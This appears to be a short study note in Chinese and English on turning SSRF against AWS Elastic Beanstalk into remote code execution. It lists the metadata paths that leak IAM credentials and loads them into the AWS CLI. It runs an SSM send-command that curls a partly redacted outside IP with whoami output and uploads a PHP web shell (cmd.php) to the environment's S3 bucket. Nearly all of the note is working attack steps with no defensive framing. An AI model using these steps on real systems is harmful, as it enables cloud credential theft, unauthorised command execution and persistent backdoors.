学习关于AWS服务器,主要是了解SSRF构造RCE方面

header key

X-Amz-Cf-Id

AWS Envrion ment

How to know Service

  • /latest/meta-data/iam/security-credentials/
    • aws-elasticbeanstalk-ec2-role: AWS Elastic Beanstalk

AWS Elastic Beanstalk

what’s AWS Elastic Beanstalk?

  • AWS Elastic Beanstalk, is a Platform as a Service (PaaS) offering from AWS for deploying and scaling web applications developed for various environments such as Java, .NET, PHP, Node.js, Python, Ruby and Go.
  • It automatically handles the deployment, capacity provisioning, load balancing, auto-scaling, and application health monitoring.

information revelation

Get AccessKeyId,SecretAccessKey,Token

  • /latest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role/

Get instanceId,accountId,region

  • /latest/dynamic/instance-identity/document/

How to use credential information

Setting envrionment

~# apt install awscli
~# export AWS_ACCESS_KEY_ID=AccessKeyId
~# export AWS_SECRET_ACCESS_KEY=SecretAccessKey
~# export AWS_DEFAULT_REGION=region
~# export AWS_SESSION_TOKEN=Token

Get UserID (?

aws sts get-caller-identity

Send command(escalate 1)

ssm send-command

查看whoami

aws ssm send-command — instance-ids “instanceId” — document-name “AWS-RunShellScript” — comment “whoami” — parameters commands=’curl 128.199.xx.xx:8080/`whoami`’ — output text — region=region

Escalate

Method 1:ssm send-command

aws ssm send-command — instance-ids “instanceId” — document-name “AWS-RunShellScript” — comment “whoami” — parameters commands=’curl 128.199.xx.xx:8080/`whoami`’ — output text — region=region

Method 2: ssh

“creating a RSA authentication key pair (public key and private key), to be able to log into a remote site from the account, without having to type the password.”

Step 1: Using existing information to construct buckeyname

elasticbeanstalk-<region>-<account-id>

like:

elasticbeanstalk-us-east-1–76xxxxxxxx00

Step 2: Use aws s3 ls to get bucket resources in a recursive manner

 aws s3 ls s3://elasticbeanstalk-us-east-1–76xxxxxxxx00/ — recursive

Step 3: Upload Backdoor

cmd.php

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
aws s3 cp cmd.php s3://elasticbeanstalk-us-east-1–76xxxxxxxx00/
upload: ./cmd.php to s3://docs.redact.com/cmd.php

Reference